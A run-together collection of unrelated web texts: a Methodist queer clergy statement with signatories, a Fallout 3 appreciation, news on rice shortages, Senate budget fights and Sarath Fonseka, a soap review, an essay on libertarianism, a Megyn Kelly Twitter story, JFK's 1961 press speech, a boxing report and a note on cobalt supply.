The recent proposal from the Uniting Methodist Movement ( UMM ) declares itself a vision forward for The United Methodist Church ( UMC ) . It neither prohibits nor compels discrimination on the basis of sexual orientation or gender identity . It also neither prohibits nor compels the full inclusion of Lesbian , Gay , Bisexual Transgender , Queer , Intersex , and Agender ( LGBTQIA+ ) persons as a response to the love of God in Christ Jesus .
We , the members of the United Methodist Queer Clergy Caucus , celebrate UMM 's call to “ challenge in love all that divides. ” We affirm it as the same call we have made for 45 years . Yet it is difficult to see how the UMM is not a contradiction to the very call it espouses . It represents a significant reconfiguration of the connectional spirit of the UMC . The UMM path threatens to fragment the grace-filled alliance between LGBTQIA+ persons and our allies by trading inclusion away for the sake of unity . In short , the UMM is the very iteration of “ all that divides . ”
Given these ramifications , here are our primary concerns :
By trivializing LGBTQIA+ justice , the UMM does further injury to those who have already been harmed ;
The UMM does not fully take LGBTQIA+ voices into account ;
LGBTQIA+ persons could not sign on to the UMM plan without participating in our own oppression or that of other members of our community ;
The UMM is built on the delusion that the perpetuation of injustice is as moral as seeking of justice ;
The UMM breaches our principle of connectionalism – where all persons can “ participate in every level of connectional life and ministry . ; ”
It is as though we have become the Laodicean church described in Revelation : “ So , because you are lukewarm , and neither cold nor hot , I am about to spit you out of my mouth ” ( Rev . 3:16 ) . To seek a middle ground between inclusion and discrimination is to place institutional preservation before our call to follow the way of Jesus , in whom we have the freedom “ to resist evil , injustice and oppression in whatever form they present themselves. ” ( UMC Baptismal vows )
We , LGBTQIA+ clergy , seek to live into this freedom and to do so with our kin in Christ . We seek reconciliation and fellowship . It is our prayerful hope and expectation that our voices in this response might be heard and engaged . As the Christ-spirit empowers and emboldens us , we look forward to working with the signatories to find a heart- and mind-expanding , hope- and faith-filled way to be and to grow into being the Beloved Community . This is the invitation we extend , in love and communion , to our kin in the UMM , and indeed to all the UMC community . Join us in envisioning our Beloved Community as that place , where all are atypical and all are welcome .
We look forward to the day when The United Methodist Church will live out the truth of the Gospel : That God 's love is for all people , and that we are all one in Christ Jesus .
May it be so !
# CalledOUT # NoMoreCrumbs
p.s . The `` + '' symbol simply stands for all of the other sexualities , sexes , and genders that are n't included in these few letters
Please Click here to add your signature in solidarity !
Initial Signatories
Rev . Jeanelle Nicolas Ablola
Rev . Brian Adkins
Rev . Austin L. Adkinson
Rev . Dr. Israel I. Alvaran
Rev . Elyse Ambrose
Rev . Daryl Blanksma
Rev . Alex da Silva Souto
Rev . Sean Delmore
Rev . Anthony Fatta
Rev . Becca Girrell
Rev . C. Michele Johns
Rev . Lindsey Kerr
Rev . Lea Matthews
Rev . Lois McCullen Parr
Rev . Courtney McHill
Mrs. Caroline Anne Morrison
Rev . Jonathan Rodríguez-Cintrón
Rev . Kimberly O. Scott
Rev . Dr. Althea Spencer Miller
Rev . Kristin Gill Stoneking
Rev . Martha E. Vink
Rev . Jay Williams , Ph.D .
Rev . Dr. David Weekley
Rev . Vicki Woods
Queer Clergy Caucus Signatories ( updated as 1:30pmEDT , Sept 18 , 2017 )
Rev . David W. Meredith
Rev . Katie Stickney
Rev . Cynthia S. Meyer
Rev . Laura Young
Rev Kathleen Reynolds
Rev . Ryan J. Scott
Rev . James A. Dwyer , Ph.D .
Rev . Joey Heath-Mason
Rev . Adrienne Trevathan
Rev . Dr Janet S Everhart
Deacon Vivian Ruth Waltz
Rev . Britt Cox
Ann Hunt , retired elder
Rev . Gregory H. Rogers
Rev . Maggie Roe
Rev . Dr. Edward Hansen
Rev . Dr. Jeanne G. Knepper
Rev . Jani Darak-Druck
Rev . Anna Blaedel
Rev . Dana Carroll
Anthony Larson Deacon Candidate
Pastor Kathi Meyerson
Rev . Sara Thompson Tweedy
Rev . M Barclay
Rev . Matthew Pearson
Peter Jabin , Diaconal Minister
Rev . Ardis Letey , Deacon
Rev . Nancy Kay Yount
WHY I LOVE In Why I Love , PC Gamer writers pick an aspect of PC gaming that they love and write about why it 's brilliant . Today Sam appreciates the view in Fallout 3 's Capital Wasteland .
There is a trick to Fallout 3 's open world that I do n't think any other game has successfully replicated . It 's the act of showing the player something in the distance in the Capital Wasteland , whether it 's a distinctive-looking building , advertising prop , silhouette or some vague geometry that encourages me to uncover exactly what it is , to see if there 's anyone there or maybe a story to uncover . It 's definitely not the only game to attempt this—but the context of Fallout 3 's desolated landscape makes the horizon an effective device . In this world where there 's nowhere and nothing left , you want to see everything .
Skyrim is almost as good at doing this , but it 's really the difference in fiction that makes Fallout 3 pull ahead for me . I 've always preferred Fallout 3 over Skyrim , and that 's no slight to the scale or detail of the 2011 RPG—it 's certainly a more refined game , particularly in combat and progression . It 's the more human premise . As fanciful and pulpy as the various storylines are , the scenario of a nuclear strike is a real world concern ( especially in decades past ) , which has a more powerful narrative draw to me than high fantasy .
I 've always preferred Fallout 3 over Skyrim , and that 's no slight to the scale or detail of the 2011 RPG
You 're experiencing , in first-person , a detailed interpretation of what happens to a populated real-life city in the aftermath of nuclear war . Making that environment into something that players want to explore , when working within those parameters , is a testament to Bethesda 's ability to make the grey remnants of human life look extraordinary—and the horizon is the best tool the game has to show that off .
When I first leave Vault 101 , I can see the Capitol Building and the Washington Monument off in the distance . When I reach the river , I can make out the statues on the Anchorage memorial . Tenpenny Tower is usually a sign I 'm going in the wrong direction . I 'm never in the middle of nowhere in Fallout 3—Bethesda mapped the landscape so it 's very difficult to see nothing in all directions . This layout feeds your sense of exploration . Following the main storyline is a good way to get a tourist 's snapshot of each quadrant of the world , but wandering without a waypoint is the way to properly experience that world . When I first played through Fallout 3 years ago , it was following the skyline that randomly led me to the Oasis side quest with a nuclear tree man and his insane followers , probably the game 's best . Objects and quests are not randomly placed in this world—but their locations are n't clearly spelled out for you , either . It 's a delicate balance of encouraging the player to explore and not making it too hard to further the narrative . No-one is better at finding the point in between than Bethesda .
The success of the Capital Wasteland as an environment is based equally in art direction and design . A friend of mine once observed that the difference between the art direction of Fallout 3 compared with that of a more colourful , otherworldly locale like something from Final Fantasy XIII is the level of challenge involved in what 's being created . I 've thought about that a lot when replaying Fallout 3 . Bethesda draws beautiful imagery out of the destruction of the real world—there is some out-there sci-fi iconography in the robot and creature design , but Washington DC is a familiar place and is treated as such . It 's designed to provoke us through our images of everyday life , and what that would look like if it was suddenly taken away . My friend posited that creating a gorgeous and exciting backdrop out of a nuked real world location is way harder than building one where there are seemingly no rules as to how colour palette must be used . Replaying Fallout 3 now , I agree with him . There 's rubble , destroyed cars , greying fields , no fauna—but it 's amazing to look at , even now .
Fallout 3 's world is rougher in detail than I remember it , but that urge to explore is the same to me , even though I remember where a lot of the places are . I look up , and I see a rock face in an interesting shape , a broken freeway , a small abandoned town , a centaur wandering by the waterside , some kind of factory—the sky is a grim colour , and all the people are gone , but I still want to keep following that horizon .
SHANGHAI -- A spike in the price of rice and other food staples is triggering consumer panic , including food riots in Yemen and Morocco , and hoarding in Hong Kong .
Governments around the world have taken radical measures in recent weeks to control their countries ' supplies of rice . Egypt last week said it would ban all rice exports for six months . Cambodia has stopped all private-sector exports of rice , and India and Vietnam also have imposed restrictions .
The price of grains -- corn , wheat , and rice -- has been rising since 2005 under pressure from farmers who would rather plant crops for biofuels than for food , the lack of technological breakthroughs in crop yields , and drought and disease . The sharpest increase has been this year , with the price of Thai rice , a world benchmark , nearly doubling since January , to $ 760 per metric ton . Some analysts expect that price to reach $ 1,000 in the next three months .
Tang Min , a former chief economist for the Asian Development Bank , said the price increase is the inevitable consequence of supply and demand . `` The world population is increasing , but the increase in the planting of rice has not been as fast , '' he said .
Despite efforts by governments to increase public-sector wages and introduce food subsidies , price increases and shortages have led to violent clashes along supply lines , in food distribution centers and at supermarkets .
`` Rice shortages and unrest are not necessarily linked , until you think about the poor . Rice is of high importance in these people 's daily lives , '' said Tang , deputy secretary general for the China Development Research Foundation , a Beijing-based research group .
Nowhere is that more true than in Asia , where a meal is n't a meal without rice .
Wang Qing , an economist for Morgan Stanley in Hong Kong , said U.S. laws encouraging the development of biofuels are the origin of the problem in Asia and elsewhere . This `` directly led to the reduction of foodstuff planting , '' he said . `` Without the oil price increasing substantially , the corn price will not increase . Without corn prices increasing quickly , the rice price will not rise . ''
To encourage farmers to go back to planting food , China , Indonesia and other countries are increasing their minimum compensation to farmers who grow grains for human consumption .
But as food-growing countries move to increase production and curb exports , they are under pressure from rice-importing neighbors seeking their help . Bangladesh has announced that it will import 400,000 tons of rice and sell it below cost . The Philippines , where demonstrators have taken to the streets to criticize the government for not doing enough to control inflation , is appealing to other countries for emergency supplies .
Cambodian Finance Minister Keat Chhon last week called for people to be calm . He urged them `` not to stock up on foods , which could make the situation even harder . ''
Some experts say that building reserves to protect against future shortages only makes the problem worse .
I had been mildly successful in avoiding Lush stores – while being able to smell them a mile away I 've never really managed to get over the general sense of revulsion I experience when walking near one . I bit the bullet and actually decided to venture into their Manchester store a couple of years go ( looking back , sadly for me it was actually close to a decade ago ) – yes the hype I 'd read about Lush overcame the rational ( well I think I 'm rational ) thoughts bouncing around my noggin ( that 's head for you non-Northern readers ) .
`` I Should Coco '' soap bar . I 'd read about the `` I Should Coco '' soap bar online and saw it as too girlie to actually use . I bought a 100g bar and from the first time I used it I was hooked .
The pictures show the bar in all its glory and I wo n't be going into any amazing description of it . The only thing that you tend to miss nowadays when buying it online like some sort of subversive is the coconut on the top as shown below from my latest eBay purchase . For £1.95 for a bar weighing 100g it was never cheap soap by any stretch of the imagination .
Layered into three shades of pink the topside of the bar was coated in flakes of coconut making it very easy to grip , even when wet . Basically the soap looked and oozed a very feminine vibe . It 's not something you 'd be rushing to take into the showers at the gym .
The bar itself contains creamed coconut along with Orange and Coriander oil which smells almost sickly sweet . I was n't sure whether I should be washing with it , or indeed taking a sizeable bite from it . The mild coconut aroma is striking and blends fantastically well with the Orange oils .
After it is immersed in warm water , the aroma from the bar increases but never becomes overpowering on the senses . I 'm now down to my last nub of the soap and actually worried about the day it is no more , deceased like a certain Norwegian Blue ( if you do n't get it reference 'Dead Parrot ' by Monty Python ) .
The beauty of this soap is that that it lathers up superbly , with a little going a very long way . The coconut flakes act as a mild abrasive , exfoliating dead skin as you wash meaning that not only did you not need to use half a bar in the shower , but you also did n't need to use a different product to moisturise after washing .
The final results were and continue to be amazing , my skin felt clean , fresh and above all moisturised . Any traces of body odour after travelling on a packed tube train were removed and the soap left a very subtle but noticeable coconut fragrance that lingered for a few hours . What more could you ask from a soap ?
I now regularly use this in the shower and have n't noticed any adverse effects at all . I 'm actually quite tight with the use now though ! The only problems apart from the actual price is that when used in the bath the soap does fall to pieces rather quickly . It turns the water pink , there is an oily residue around the bath and floating pieces of coconut seem to take an absolute age to remove when getting dried !
Overall I love this product and will not be returning to 90 % of the major high street brands .
Using this encouraged me to try more from the Lush range . I 've been converted – I 'm no longer a Lush-o-sceptic !
HIGHLY RECOMMENDED
BeautykingUK needs you ! I 'm so in love with this soap that I think we should let Lush know how we feel .
Show your support for the reintroduction of `` I Should Coco '' by clicking on the poll on the right hand side of this page - two seconds of your time could sway opinion .
Last year , the New York Times Magazine published an article pondering whether the “ Libertarian Moment ” has come at last . Five months before that , Pew reported that 50 percent of millennials identify as political independents . The same report also found that 51 percent of millennials favor gay marriage and 29 percent are religiously unaffiliated , dovetailing with other common libertarian views .
Libertarians are quickly becoming more prolific , at the very least in their cultural impact if not in absolute numbers . Living in D.C. 's periphery , I ca n't help but notice it . At a party over the summer , a friend and I were chatting when a young woman came up and joined the discussion . As it happened , we started to share our political views , and she referred to herself an anarchist . Typically , when the term “ anarchist ” appears in the media , the discussion usually revolves around protests or acts of violence . The perpetrators are grungy looking guys , bearded and unkempt . She did n't fit the usual stereotype . She seemed put-together and well-spoken , with nary a wild gleam in her eye .
Her reasoning , though , was intriguing . When talking about her beliefs , she said she thought “ people do better on their own ” and that externally imposed rules , whether from government or elsewhere , limit people 's attempts to live life to the fullest , or something to that effect . She was no anarchist , at least not in the old sense . She was a young reader of Reason Magazine .
So why keep the name ? What does anarchism mean to her and many others ? Apparently , it means an ideal world in which everyone is left to his own devices , free to create “ voluntary societies , ” where coercion is nonexistent . No social conservatism from the Right , and no political correctness from the Left . People live by the Non-Aggression Principle : “ Do n't bother me , and I wo n't bother you . ”
That 's what my up-and-coming peers believe can happen , if we only get our civic scruples right . After all , they have done pretty well so far in their lives following just that ethos . They work hard , do n't drink too much , and avoid dicey people . They made it into select colleges and , after graduation , entered professional spheres . They entered the achievement competition and came out on top . They 're proud of themselves , but they 're not going to criticize the lagging and wayward 80 percent that did n't make it to selective colleges and aim for the professional workplace . Let everybody make their own choices .
The attitude is less about tolerance than carelessness . Let 's return to the Pew report . One of its findings is that only around one in five millennials believes that most people can be trusted . That 's an extraordinary result , but it helps explain the libertarian posture . It is hard to be charitable toward or responsible to others if you mistrust them .
Here is the clearest difference between the new anarchists and their forebears . The original anarchists wanted to tear down the government in order to free the downtrodden ; the new ones want to do so to free themselves . The lesser orders have nothing to do with it .
In Heretics , Chesterton wrote , “ Self is the gorgon . Vanity sees it in the mirror of other men and lives . Pride studies it for itself and is turned to stone. ” The new anarchism is , at its core , the adoration of self . In that sense , it really is anarchical . Just like any sort of worship that is not directed toward its true end , God , it will devour others and ultimately itself .
Ben Bristor is an undergraduate student studying economics and theology at Mount St. Mary 's University .
Fox News host Megyn Kelly launched a Twitter attack on photo and greeting card company Shutterfly on Thursday after it apparently failed to deliver her Christmas cards on time , an apparent scandal the media star dubbed “ Christmascardgate ” .
“ Hey Shutterfly – thanks for lying for weeks about sending out our Christmas card order only to admit that it was all BS , ” Kelly tweeted on Friday , including the hashtag “ # notprofessional . ”
Hey @ Shutterfly– thanks for lying for weeks about sending out our Christmas card order only to admit today it was all B.S . # notprofessional — Megyn Kelly ( @ megynkelly ) December 23 , 2016
She followed that up with , “ I will never use this service again . Lied right to us about our Xmas cards only to admit later they failed & covered it up . ”
I will never use this service ( @ Shutterfly ) again . Lied right to us about our Xmas cards only to admit later they failed & covered it up . — Megyn Kelly ( @ megynkelly ) December 23 , 2016
She went on to claim they had never used Twitter to “ publicly shame a company , ” but that Shutterfly “ deserved it . ”
FWIW , I have never used Twitter to publicly shame a company before in my life . @ Shutterfly was so outrageously deceptive , they deserved it . — Megyn Kelly ( @ megynkelly ) December 23 , 2016
Kelly continued her tirade against the company by retweeting several other Twitter users ' complaints .
About four hours later , she reported Shutterfly was “ working to resolve Christmascardgate , ” and surmised she got a resolution merely because of her over 2.1 million Twitter followers , few of whom actually retweeted Kelly 's posts .
.Shutterfly now working to resolve Christmascardgate . Appreciate it , but hope others w/o Twitter presence can get same att'n . — Megyn Kelly ( @ megynkelly ) December 23 , 2016
Listen to speech here : View related documents here :
President John F. Kennedy
Waldorf-Astoria Hotel , New York City
April 27 , 1961
Mr. Chairman , ladies and gentlemen :
I appreciate very much your generous invitation to be here tonight .
You bear heavy responsibilities these days and an article I read some time ago reminded me of how particularly heavily the burdens of present day events bear upon your profession .
You may remember that in 1851 the New York Herald Tribune under the sponsorship and publishing of Horace Greeley , employed as its London correspondent an obscure journalist by the name of Karl Marx .
We are told that foreign correspondent Marx , stone broke , and with a family ill and undernourished , constantly appealed to Greeley and managing editor Charles Dana for an increase in his munificent salary of $ 5 per installment , a salary which he and Engels ungratefully labeled as the `` lousiest petty bourgeois cheating . ''
But when all his financial appeals were refused , Marx looked around for other means of livelihood and fame , eventually terminating his relationship with the Tribune and devoting his talents full time to the cause that would bequeath the world the seeds of Leninism , Stalinism , revolution and the cold war .
If only this capitalistic New York newspaper had treated him more kindly ; if only Marx had remained a foreign correspondent , history might have been different . And I hope all publishers will bear this lesson in mind the next time they receive a poverty-stricken appeal for a small increase in the expense account from an obscure newspaper man .
I have selected as the title of my remarks tonight `` The President and the Press . '' Some may suggest that this would be more naturally worded `` The President Versus the Press . '' But those are not my sentiments tonight .
It is true , however , that when a well-known diplomat from another country demanded recently that our State Department repudiate certain newspaper attacks on his colleague it was unnecessary for us to reply that this Administration was not responsible for the press , for the press had already made it clear that it was not responsible for this Administration .
Nevertheless , my purpose here tonight is not to deliver the usual assault on the so-called one party press . On the contrary , in recent months I have rarely heard any complaints about political bias in the press except from a few Republicans . Nor is it my purpose tonight to discuss or defend the televising of Presidential press conferences . I think it is highly beneficial to have some 20,000,000 Americans regularly sit in on these conferences to observe , if I may say so , the incisive , the intelligent and the courteous qualities displayed by your Washington correspondents .
Nor , finally , are these remarks intended to examine the proper degree of privacy which the press should allow to any President and his family .
If in the last few months your White House reporters and photographers have been attending church services with regularity , that has surely done them no harm .
On the other hand , I realize that your staff and wire service photographers may be complaining that they do not enjoy the same green privileges at the local golf courses that they once did .
It is true that my predecessor did not object as I do to pictures of one 's golfing skill in action . But neither on the other hand did he ever bean a Secret Service man .
My topic tonight is a more sober one of concern to publishers as well as editors .
I want to talk about our common responsibilities in the face of a common danger . The events of recent weeks may have helped to illuminate that challenge for some ; but the dimensions of its threat have loomed large on the horizon for many years . Whatever our hopes may be for the future -- for reducing this threat or living with it -- there is no escaping either the gravity or the totality of its challenge to our survival and to our security -- a challenge that confronts us in unaccustomed ways in every sphere of human activity .
This deadly challenge imposes upon our society two requirements of direct concern both to the press and to the President -- two requirements that may seem almost contradictory in tone , but which must be reconciled and fulfilled if we are to meet this national peril . I refer , first , to the need for a far greater public information ; and , second , to the need for far greater official secrecy .
I
The very word `` secrecy '' is repugnant in a free and open society ; and we are as a people inherently and historically opposed to secret societies , to secret oaths and to secret proceedings . We decided long ago that the dangers of excessive and unwarranted concealment of pertinent facts far outweighed the dangers which are cited to justify it . Even today , there is little value in opposing the threat of a closed society by imitating its arbitrary restrictions . Even today , there is little value in insuring the survival of our nation if our traditions do not survive with it . And there is very grave danger that an announced need for increased security will be seized upon by those anxious to expand its meaning to the very limits of official censorship and concealment . That I do not intend to permit to the extent that it is in my control . And no official of my Administration , whether his rank is high or low , civilian or military , should interpret my words here tonight as an excuse to censor the news , to stifle dissent , to cover up our mistakes or to withhold from the press and the public the facts they deserve to know .
But I do ask every publisher , every editor , and every newsman in the nation to reexamine his own standards , and to recognize the nature of our country 's peril . In time of war , the government and the press have customarily joined in an effort based largely on self-discipline , to prevent unauthorized disclosures to the enemy . In time of `` clear and present danger , '' the courts have held that even the privileged rights of the First Amendment must yield to the public 's need for national security .
Today no war has been declared -- and however fierce the struggle may be , it may never be declared in the traditional fashion . Our way of life is under attack . Those who make themselves our enemy are advancing around the globe . The survival of our friends is in danger . And yet no war has been declared , no borders have been crossed by marching troops , no missiles have been fired .
If the press is awaiting a declaration of war before it imposes the self-discipline of combat conditions , then I can only say that no war ever posed a greater threat to our security . If you are awaiting a finding of `` clear and present danger , '' then I can only say that the danger has never been more clear and its presence has never been more imminent .
It requires a change in outlook , a change in tactics , a change in missions -- by the government , by the people , by every businessman or labor leader , and by every newspaper . For we are opposed around the world by a monolithic and ruthless conspiracy that relies primarily on covert means for expanding its sphere of influence -- on infiltration instead of invasion , on subversion instead of elections , on intimidation instead of free choice , on guerrillas by night instead of armies by day . It is a system which has conscripted vast human and material resources into the building of a tightly knit , highly efficient machine that combines military , diplomatic , intelligence , economic , scientific and political operations .
Its preparations are concealed , not published . Its mistakes are buried , not headlined . Its dissenters are silenced , not praised . No expenditure is questioned , no rumor is printed , no secret is revealed . It conducts the Cold War , in short , with a war-time discipline no democracy would ever hope or wish to match .
Nevertheless , every democracy recognizes the necessary restraints of national security -- and the question remains whether those restraints need to be more strictly observed if we are to oppose this kind of attack as well as outright invasion .
For the facts of the matter are that this nation 's foes have openly boasted of acquiring through our newspapers information they would otherwise hire agents to acquire through theft , bribery or espionage ; that details of this nation 's covert preparations to counter the enemy 's covert operations have been available to every newspaper reader , friend and foe alike ; that the size , the strength , the location and the nature of our forces and weapons , and our plans and strategy for their use , have all been pinpointed in the press and other news media to a degree sufficient to satisfy any foreign power ; and that , in at least in one case , the publication of details concerning a secret mechanism whereby satellites were followed required its alteration at the expense of considerable time and money .
The newspapers which printed these stories were loyal , patriotic , responsible and well-meaning . Had we been engaged in open warfare , they undoubtedly would not have published such items . But in the absence of open warfare , they recognized only the tests of journalism and not the tests of national security . And my question tonight is whether additional tests should not now be adopted .
The question is for you alone to answer . No public official should answer it for you . No governmental plan should impose its restraints against your will . But I would be failing in my duty to the nation , in considering all of the responsibilities that we now bear and all of the means at hand to meet those responsibilities , if I did not commend this problem to your attention , and urge its thoughtful consideration .
On many earlier occasions , I have said -- and your newspapers have constantly said -- that these are times that appeal to every citizen 's sense of sacrifice and self-discipline . They call out to every citizen to weigh his rights and comforts against his obligations to the common good . I can not now believe that those citizens who serve in the newspaper business consider themselves exempt from that appeal .
I have no intention of establishing a new Office of War Information to govern the flow of news . I am not suggesting any new forms of censorship or any new types of security classifications . I have no easy answer to the dilemma that I have posed , and would not seek to impose it if I had one . But I am asking the members of the newspaper profession and the industry in this country to reexamine their own responsibilities , to consider the degree and the nature of the present danger , and to heed the duty of self-restraint which that danger imposes upon us all .
Every newspaper now asks itself , with respect to every story : `` Is it news ? '' All I suggest is that you add the question : `` Is it in the interest of the national security ? '' And I hope that every group in America -- unions and businessmen and public officials at every level -- will ask the same question of their endeavors , and subject their actions to the same exacting tests .
And should the press of America consider and recommend the voluntary assumption of specific new steps or machinery , I can assure you that we will cooperate whole-heartedly with those recommendations .
Perhaps there will be no recommendations . Perhaps there is no answer to the dilemma faced by a free and open society in a cold and secret war . In times of peace , any discussion of this subject , and any action that results , are both painful and without precedent . But this is a time of peace and peril which knows no precedent in history .
II
It is the unprecedented nature of this challenge that also gives rise to your second obligation -- an obligation which I share . And that is our obligation to inform and alert the American people -- to make certain that they possess all the facts that they need , and understand them as well -- the perils , the prospects , the purposes of our program and the choices that we face .
No President should fear public scrutiny of his program . For from that scrutiny comes understanding ; and from that understanding comes support or opposition . And both are necessary . I am not asking your newspapers to support the Administration , but I am asking your help in the tremendous task of informing and alerting the American people . For I have complete confidence in the response and dedication of our citizens whenever they are fully informed .
I not only could not stifle controversy among your readers -- I welcome it . This Administration intends to be candid about its errors ; for as a wise man once said : `` An error does not become a mistake until you refuse to correct it . '' We intend to accept full responsibility for our errors ; and we expect you to point them out when we miss them .
Without debate , without criticism , no Administration and no country can succeed -- and no republic can survive . That is why the Athenian lawmaker Solon decreed it a crime for any citizen to shrink from controversy . And that is why our press was protected by the First Amendment -- the only business in America specifically protected by the Constitution- -not primarily to amuse and entertain , not to emphasize the trivial and the sentimental , not to simply `` give the public what it wants '' -- but to inform , to arouse , to reflect , to state our dangers and our opportunities , to indicate our crises and our choices , to lead , mold , educate and sometimes even anger public opinion .
This means greater coverage and analysis of international news -- for it is no longer far away and foreign but close at hand and local . It means greater attention to improved understanding of the news as well as improved transmission . And it means , finally , that government at all levels , must meet its obligation to provide you with the fullest possible information outside the narrowest limits of national security -- and we intend to do it .
III
It was early in the Seventeenth Century that Francis Bacon remarked on three recent inventions already transforming the world : the compass , gunpowder and the printing press . Now the links between the nations first forged by the compass have made us all citizens of the world , the hopes and threats of one becoming the hopes and threats of us all . In that one world 's efforts to live together , the evolution of gunpowder to its ultimate limit has warned mankind of the terrible consequences of failure .
And so it is to the printing press -- to the ( recorder ) of man 's deeds , the keeper of his conscience , the courier of his news -- that we look for strength and assistance , confident that with your help man will be what he was born to be : free and independent .
Miguel Cotto fought until the final bell and lost , but Miguel Cotto also won ( Getty Images )
“ You 're a hell of a champion…you 're the toughest guy I ever fought. ” —Mayweather to Cotto in the ring after the fight .
And that 's what happened to Miguel Cotto tonight as he lost the fight but earned $ 8 million in the process . Given the quick manner in which he left the ring after the fight , it may well be that this will be his swan song . If so , that 's a great package with which to retire .
However , rather than take an easy way out , Cotto came to win and he gave it 110 % fighting as hard as he could right up until the very end . In fact , as late as the end of the eighth round , he landed several punches to the head , prompting Mayweather to shake his head as if they did n't hurt—a sure sign that they did hurt .
However , it simply was a case of too much technical skill , accuracy , and speed , as Floyd began landing looping rights behind the guard of the game Miguel and then made an even more effective adjustment when he started drilling Cotto with sharp left uppercuts . These moves , along with his uncommon stamina , allowed Mayweather to dominate late and seal the deal over the last four rounds , In fact , he almost floored Cotto in the 12th round as he pulled out a UD win to remain unbeaten in 43 fights . Two judges scored the fight 117-111 and the third had it 118-110 .
After the fight , Floyd was both gracious and fresh notwithstanding a bloody nose that stayed with him for most of the fight . ‘ ‘ He 's a tough competitor , '' Mayweather said . ‘ ‘ He came to fight . He did n't just come to survive . I dug down and fought him back . '' Floyd reportedly made at least $ 32 million , but was forced to fight every minute of all 12 rounds against the relentless Puerto Rican champion whose battered face reflected the accuracy of Mayweather 's punches .
As for the popular Cotto , his fans did n't get a chance to hear his thoughts after the fight , but they do know that he will never have a financial worry for the rest of his days and , for that matter , for the rest of his children 's days .
Yes , Cotto fought until the final bell and lost , but he also won .
Senate Democratic leaders say they will block the defense appropriations bill from coming to the floor this month unless there is a deal to lift ceilings on government spending known as the sequester .
“ Our military does n't deserve budget gimmicks . They deserve real support , ” Sen. Charles Schumer Charles ( Chuck ) Ellis SchumerBrennan fires back at 'selfish ' Trump over Harry Reid criticism Trump rips Harry Reid for 'failed career ' after ex-Dem leader slams him in interview Harry Reid : ' I do n't see anything ' Trump is doing right MORE ( N.Y. ) said Wednesday .
ADVERTISEMENT
Democrats have been complaining about the GOP 's decision to keep sequester spending limits , while increasing a Pentagon war fund as a way to give more money to the military . The White House has said President Obama will veto a separate Defense authorization bill over the issue .
White House Chief of Staff Denis McDonough met with Senate Democrats on Tuesday to urge them to block the defense authorization bill from coming to a final vote .
Many Democrats , however , are leery about derailing that bill because they fear being labeled anti-military by Republican critics .
Instead , they 're planning to take their stand on the defense appropriations measure , which McConnell is expected to bring to the floor later this month .
“ Republicans should be absolutely crystal clear about one thing : Democrats will not vote to put a defense appropriations bill on the floor that uses accounting trickery and budget gimmicks to fund our troops , ” Schumer added .
He said that Senate Democrats will block motions to proceed to any appropriations bill “ until Republicans have sat down at the table and figured out with us how we 're going to properly fund the Defense Department and key priorities that help families , fuel economic growth and keep us safe and strong at home . ”
Sen. Dick Durbin Richard ( Dick ) Joseph DurbinKids confront Feinstein over Green New Deal Senate plots to avoid fall shutdown brawl Overnight Energy : Trump ends talks with California on car emissions | Dems face tough vote on Green New Deal | Climate PAC backing Inslee in possible 2020 run MORE ( Ill. ) , the ranking Democrat on the Senate Defense Appropriations Subcommittee , said the caucus would recommend to its members that they vote against proceeding to the defense appropriations bill .
“ We need to have the highest level of negotiation between the White House and the leaders in Congress to work out an agreement that finally puts an end to sequestration , ” he said .
Senate Majority Leader Mitch McConnell ( R-Ky. ) blasted Democrats for threatening to block the defense spending bill .
“ Underscoring their devotion to D.C. dysfunction , Democrats are now threatening to deny funding for the brave men and women who protect us , their families , and veterans in a childish gambit to wrest billions more for wasteful bureaucracies like the IRS , '' he said in a statement .
`` Though their behavior is completely discordant with the real challenges facing our country , we nonetheless intend to work our way through this , ” he added .
- Updated at 10:23 p.m .
Image copyright AFP Image caption Former army chief Sarath Fonseka campaigned against Mahinda Rajapaksa in elections earlier this month
The new Sri Lankan government has removed punishments imposed on controversial war-time army chief Sarath Fonseka by the previous regime .
Mr Fonseka has been reinstated as an army general and his right to vote and stand in elections has been restored .
His rights were removed after he was jailed for corruption and other crimes .
Mr Fonseka and former President Mahinda Rajapaksa oversaw a military campaign against Tamil rebels in which thousands of civilians are said to have died .
The two men later fell out and Mr Fonseka stood against his former ally in the 2010 presidential election .
He was jailed shortly afterwards and deprived of his political rights .
The former army chief had already been pardoned and freed by Mr Rajapaksa .
But correspondents say the move by new President Maithripala Sirisena amounts to a quashing of his previous convictions .
Sources told the BBC that a corruption case against him has also been dropped , and he has discontinued an appeal against his convictions .
Analysis : Charles Haviland , former Sri Lanka correspondent , BBC News
Sarath Fonseka is one of the most divisive figures in Sri Lankan politics . He led the army to victory over the Tamil Tigers in a campaign controversial for its large number of civilian casualties .
He has denied allegations contained in a UN-commissioned report that tens of thousands of civilian Tamils were killed .
But , speaking to the BBC in 2012 , he said Sri Lanka must co-operate with any international investigation into war crimes allegations . Such statements had him branded as a `` traitor '' by the previous Rajapaksa government .
Whether he will adopt the same stance under the apparent new order in Colombo remains to be seen .
The new president , Maithripala Sirisena , who is strongly backed by Mr Fonseka , disowned Mr Rajapaksa but vowed not to allow him to be hauled before an international war crimes court .
The Rajapaksa government also refused to allow a team of UN-mandated war crimes investigators into the country . It seems unlikely Mr Sirisena , who was once a close ally of the former president , will do otherwise .
Image copyright Reuters Image caption Mr Fonseka ( far right ) was part of of a united opposition which inflicted a shock defeat on President Rajapaksa
Over a career of four decades , Sarath Fonseka has been Sri Lanka 's most high profile and arguably its most tactically successful army officer , playing a key role in the defeat of Tamil Tiger rebels in May 2009 .
President Sirisena had promised to rehabilitate him after the former general played a key role in his election victory earlier this month .
Right groups say that Mr Fonseka and President Rajapaksa are both implicated in shooting Tamil fighters as they sought to surrender . Both men deny the allegations .
Mr Fonseka , who was nearly assassinated by a Tamil Tiger suicide bomber in 2006 , once told the BBC the `` crowning achievement '' of his military career was wiping out the rebels .
The battery industry currently uses 42 percent of global cobalt production , a critical metal for Lithium-ion cells . The remaining 58 percent is used in diverse industrial and military applications ( super alloys , catalysts , magnets , pigments… ) that rely exclusively on the material .
Approximately 97 percent of the world 's supply of cobalt comes as a by-product of nickel or copper ( mostly out of Africa ) . Freeport-McMoRan Inc. and Lundin agreed to sell to Chinese players their respective stakes in the Tenke Fungurume mine , one of the largest known cobalt sources , in the Democratic Republic of the Congo .
Tesla has stated that the cobalt it needs will be sourced exclusively in North America , but the math does n't seem to add up .
Is Tesla doomed ? Not necessarily…
